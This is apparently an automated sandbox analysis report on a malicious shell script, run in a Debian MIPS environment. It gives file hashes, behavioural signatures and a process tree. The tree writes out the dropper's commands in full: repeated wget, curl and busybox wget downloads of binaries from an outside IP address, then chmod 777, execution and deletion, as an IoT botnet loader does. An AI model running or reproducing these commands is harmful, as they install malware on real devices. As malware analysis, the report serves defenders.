Analysis
-
max time kernel
68s -
max time network
70s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
28/10/2024, 02:23
Static task
static1
Behavioral task
behavioral1
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh
-
Size
10KB
-
MD5
6c8b51991fdf61d5e4d608d79172aadd
-
SHA1
10016e44064fd77256e054fe97e269bf6b46fc5e
-
SHA256
39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335
-
SHA512
3db47a0dc66e9e868e1048b5fe9d76623218d7b22e383a0fe08a6aa839e389312ead6a4f05da171606cfb61b1898bede08be48c1fa45548d78071e0d95d8edb2
-
SSDEEP
192:QFJGhYwT11BGFV2uRjPe7jbP8lglFJGhYw91BGFV+jPe7jvee:4oTuYP8GvNN
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 900 chmod 948 chmod 912 chmod 924 chmod 795 chmod 837 chmod 906 chmod 888 chmod 918 chmod 930 chmod 936 chmod 738 chmod 849 chmod 870 chmod 942 chmod 972 chmod 730 chmod 858 chmod 864 chmod 960 chmod 966 chmod 830 chmod 843 chmod 954 chmod 766 chmod 894 chmod 882 chmod 876 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 732 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 739 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 767 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 796 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 832 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 838 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 844 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 850 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 859 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 865 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 871 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 877 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 883 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 889 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh 895 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg 901 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s 907 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA 913 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X 919 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX 925 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva 931 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 937 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv 943 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl 949 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ 955 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 961 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn 967 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox 973 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl File opened for modification /tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0 curl File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl curl File opened for modification /tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg curl File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA curl File opened for modification /tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl File opened for modification /tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv curl File opened for modification /tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X curl File opened for modification /tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s curl File opened for modification /tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8 curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ curl File opened for modification /tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn curl File opened for modification /tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox curl File opened for modification /tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh curl File opened for modification /tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX curl
Processes
-
/tmp/39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh/tmp/39e10ef37dd81e5b6b122495f5d678e5813c416eb7129050525d72cc8dbbd335.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:709
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:717
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:727
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:730
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:733
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:735
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:736
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:737
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:740
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:763
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:766
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:767
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:770
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:772
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:780
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:790
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:795
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:796
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:814
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:826
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:830
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:836
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:840
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:842
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:848
-
-
/bin/chmodchmod 777 TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX8./TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:856
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:857
-
-
/bin/chmodchmod 777 pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv./pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm pB5ivXkbQcDrzxIFFStlGFBBDYRSJvtVSv2⤵PID:860
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:861
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:863
-
-
/bin/chmodchmod 777 T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- File and Directory Permissions Modification
PID:864
-
-
/tmp/T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox./T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵
- Executes dropped EXE
PID:865
-
-
/bin/rmrm T0u8dMQce4Wyqahnpw1xuTxVky5LyZCOox2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:869
-
-
/bin/chmodchmod 777 RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl./RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm RF0s7iqOCcBJ5Be4RhRFou78giO121lOFl2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:875
-
-
/bin/chmodchmod 777 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- File and Directory Permissions Modification
PID:876
-
-
/tmp/0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ./0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵
- Executes dropped EXE
PID:877
-
-
/bin/rmrm 0tNEh30WjKMC9cmCxXOHkVu60gvaSzrYVZ2⤵PID:878
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:879
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:880
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:881
-
-
/bin/chmodchmod 777 UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- File and Directory Permissions Modification
PID:882
-
-
/tmp/UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y0./UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵
- Executes dropped EXE
PID:883
-
-
/bin/rmrm UKQGuVIS8a3pjf3WrK9MbVEPtykAp7S0y02⤵PID:884
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:885
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:886
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:887
-
-
/bin/chmodchmod 777 kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- File and Directory Permissions Modification
PID:888
-
-
/tmp/kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn./kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵
- Executes dropped EXE
PID:889
-
-
/bin/rmrm kQxgz98PnxuQIwoP0GEXOc33Yv8XNdQXcn2⤵PID:890
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:891
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:892
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:893
-
-
/bin/chmodchmod 777 i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh./i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm i9ksxvnLd6fajtMl5LUucB6sIhiizloDAh2⤵PID:896
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:897
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:899
-
-
/bin/chmodchmod 777 uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg./uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm uNEjMYe64knx1dYJIEKB1iZ5baoxnfzEkg2⤵PID:902
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:903
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:905
-
-
/bin/chmodchmod 777 Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- File and Directory Permissions Modification
PID:906
-
-
/tmp/Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s./Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm Egt9NKccFkPDHfXbGWlmHRz45xRh6nCB9s2⤵PID:908
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:909
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:910
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:911
-
-
/bin/chmodchmod 777 im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- File and Directory Permissions Modification
PID:912
-
-
/tmp/im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA./im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵
- Executes dropped EXE
PID:913
-
-
/bin/rmrm im79ZRazVFZNLMhJsN8Kx8FhssRQsJgixA2⤵PID:914
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:915
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:916
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:917
-
-
/bin/chmodchmod 777 aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- File and Directory Permissions Modification
PID:918
-
-
/tmp/aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X./aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵
- Executes dropped EXE
PID:919
-
-
/bin/rmrm aeZ1I1LsxuEp6u0P87DE71LG7JJLz5xn5X2⤵PID:920
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:921
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:922
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:923
-
-
/bin/chmodchmod 777 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- File and Directory Permissions Modification
PID:924
-
-
/tmp/43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX./43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵
- Executes dropped EXE
PID:925
-
-
/bin/rmrm 43csAKZpPM1vTtgwnj4vGXU0GWkQTUcsaX2⤵PID:926
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:927
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:928
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:929
-
-
/bin/chmodchmod 777 UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- File and Directory Permissions Modification
PID:930
-
-
/tmp/UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva./UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵
- Executes dropped EXE
PID:931
-
-
/bin/rmrm UwKMbHwWCHMpBRpxW4SjIYXyGcqdiv8zva2⤵PID:932
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TktFMHSwdoYnDlEuUthg5n3l4oubDIsnX82⤵PID:933
-
-
